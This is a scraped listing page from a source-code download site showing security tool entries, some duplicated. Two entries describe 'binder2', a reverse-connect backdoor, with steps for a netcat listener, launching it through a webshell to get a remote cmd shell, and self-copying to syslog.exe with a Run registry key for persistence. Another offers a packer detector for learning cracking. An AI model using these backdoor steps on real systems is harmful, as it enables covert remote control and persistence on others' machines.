CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - 24
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - 24 - List
[
Firewall-Security
]
binder2
DL : 0
简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\\winnt\\下名为syslog.exe,并在 HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat - vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \\ winnt \\ named syslog.exe and HKEY_CURRENT_USER \\ \\ Software \\ \\ Microsoft \\ \\ Windows \\ \\ CurrentVe
Date
: 2008-10-13
Size
: 12kb
User
:
张军
[
Firewall-Security
]
HA_PEiD091_Momotalo
DL : 0
这是一个软件家可探测工具,程序用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [RAR SFX]加的壳,看不出使用什么编写的,但对于要学破解的朋友来说,这个工具是必不可少的。-This is a software tool, users can detect and procedures used unfiltered 0.89.6 - 1.02 / 1.05 - 1.24-gt; Markus Laszlo [RAR SFX] increase in the shell, do not see the kind of preparation, but we have to learn decipher friends , this tool is essential.
Date
: 2008-10-13
Size
: 248.22kb
User
:
博爱
[
Firewall-Security
]
NDISIM2006-24-048
DL : 0
NDIS针对IM中的数据保护处理文档,具备参考价值
Date
: 2008-10-13
Size
: 96.87kb
User
:
sky
[
Firewall-Security
]
binder2
DL : 0
简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\winnt\下名为syslog.exe,并在 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Date
: 2025-12-22
Size
: 12kb
User
:
张军
[
Firewall-Security
]
HA_PEiD091_Momotalo
DL : 0
这是一个软件家可探测工具,程序用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [RAR SFX]加的壳,看不出使用什么编写的,但对于要学破解的朋友来说,这个工具是必不可少的。-This is a software tool, users can detect and procedures used unfiltered 0.89.6- 1.02/1.05- 1.24-gt; Markus Laszlo [RAR SFX] increase in the shell, do not see the kind of preparation, but we have to learn decipher friends , this tool is essential.
Date
: 2025-12-22
Size
: 248kb
User
:
[
Firewall-Security
]
NDISIM2006-24-048
DL : 0
NDIS针对IM中的数据保护处理文档,具备参考价值-NDIS for IM data protection in the document deal with the reference value
Date
: 2025-12-22
Size
: 97kb
User
:
sky
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.